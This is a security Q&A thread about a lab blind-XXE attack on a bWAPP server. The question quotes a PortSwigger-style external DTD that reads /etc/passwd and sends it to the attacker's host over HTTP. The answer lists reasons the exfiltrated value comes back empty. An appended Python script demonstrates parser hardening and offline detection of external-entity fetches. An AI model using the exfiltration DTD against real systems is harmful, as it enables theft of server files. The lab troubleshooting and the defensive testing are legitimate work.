My lab

  1. Kali Linux: 192.168.171.134
  2. bWAPP server: http://192.168.171.131

I want to do data exfiltration via HTTP on this blind XXE.

I'll use the PortSwigger payload.

This is the external DTD:

    <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://192.168.171.134/?x=%file;'>">
    %eval;
    %exfiltrate;

This is the attempt to exploit it:

[screenshot]

As you can see, the vulnerable web application does an HTTP request to fetch the evil.DTD, but when it does the HTTP GET with /etc/passwd the GET parameter is empty. Why?

I also tried replacing /etc/passwd with /etc/hostname to avoid possible problems with < and > inside that file, but it doesn't work.

Zefiro38

1 Answer

Well, there could be many reasons (sorted by order of probability):

  1. The XML parser is running inside Docker: if it's running inside Docker, there is neither an /etc/passwd nor an /etc/hostname file to leak.
  2. The XML parser does not have enough privileges to read those files.
  3. The files you're trying to leak are in a different encoding than expected (Expected UTF-8, got UTF-16).
  4. The file you're trying to leak is corrupted.
  5. The file you're trying to leak is empty.

In all of the previous cases, instead of returning a nasty error, the parser returns an empty string, which is why the x parameter in the GET request is empty.

  • Thanks for the answer. 1) It's another VM. 2) I tried switching to the www-data user (on the bWAPP server) and I can see the /etc/passwd file with the cat command. 3) I forced UTF-8 and UTF-16 but it doesn't work; I inserted the following XML code in the HTTP request: ... / ... 4) I don't think so; how can I check? 5) It's not empty. If I use ftp:// instead of http:// I also get the same empty x value. – Zefiro38 Mar 07 '21 at 13:33
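Whatever the reason for the empty parameter, the defensive fix for this class of bug is to stop the parser from resolving external entities at all, so that the first hop (the request for evil.dtd) never happens. The following Python script is an added example, not code from the question, the answer, bWAPP or PortSwigger. It shows how to verify a parser's behaviour offline: a recording EntityResolver logs every URL the parser asks for and hands back an empty DTD instead of fetching anything. The sample request body is constructed to match the pattern described in the question (an external parameter entity pointing at the Kali host's evil.dtd); the script assumes Python 3.7.1 or later, where the standard library xml.sax stops loading external entities unless feature_external_ges is switched on.

```python
"""Check whether an XML parser will reach out for an external DTD.

Added example (not from the question or the answer). It relies on the
standard library xml.sax on Python 3.7.1+, whose expat reader only fetches
external entities when feature_external_ges is enabled. Nothing is fetched
here: a recording EntityResolver captures every URL the parser asks for and
returns an empty DTD, so the run stays offline.
"""
import io
import xml.sax
import xml.sax.handler
import xml.sax.xmlreader

# Constructed sample request body in the blind-XXE shape from the question:
# the internal subset declares an external parameter entity pointing at the
# Kali host and references it, which makes a permissive parser go and load
# http://192.168.171.134/evil.dtd before it even reaches the root element.
SAMPLE_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://192.168.171.134/evil.dtd">
  %dtd;
]>
<foo>ping</foo>
"""


class RecordingResolver(xml.sax.handler.EntityResolver):
    """Records every external resource the parser asks for, fetches nothing."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        src = xml.sax.xmlreader.InputSource()
        src.setByteStream(io.BytesIO(b""))  # an empty DTD instead of a fetch
        return src


class RootCollector(xml.sax.handler.ContentHandler):
    """Keeps the root element name to show the document itself still parses."""

    def __init__(self):
        super().__init__()
        self.root = None

    def startElement(self, name, attrs):
        if self.root is None:
            self.root = name


def parse_and_record(doc, allow_external_entities):
    """Parse doc; return (root element name, list of external URLs requested)."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, allow_external_entities)
    resolver = RecordingResolver()
    parser.setEntityResolver(resolver)
    collector = RootCollector()
    parser.setContentHandler(collector)
    src = xml.sax.xmlreader.InputSource()
    src.setByteStream(io.BytesIO(doc))
    parser.parse(src)
    return collector.root, resolver.requested


def parse_hardened(doc):
    """The configuration an XML entry point should use for untrusted input."""
    return parse_and_record(doc, allow_external_entities=False)


def parse_permissive(doc):
    """The legacy behaviour: external entities are resolved on reference."""
    return parse_and_record(doc, allow_external_entities=True)


if __name__ == "__main__":
    print("hardened  :", parse_hardened(SAMPLE_DOC))    # ('foo', [])
    print("permissive:", parse_permissive(SAMPLE_DOC))  # ('foo', ['http://192.168.171.134/evil.dtd'])
```

With the hardened setting the resolver is never consulted and the document still parses; with the feature enabled, the first thing the parser does is ask for http://192.168.171.134/evil.dtd, which is the outbound request the question observes on the Kali host. The same recording trick works as a regression test for any XML entry point: feed it a DOCTYPE with an external parameter entity and assert that the list of requested URLs stays empty.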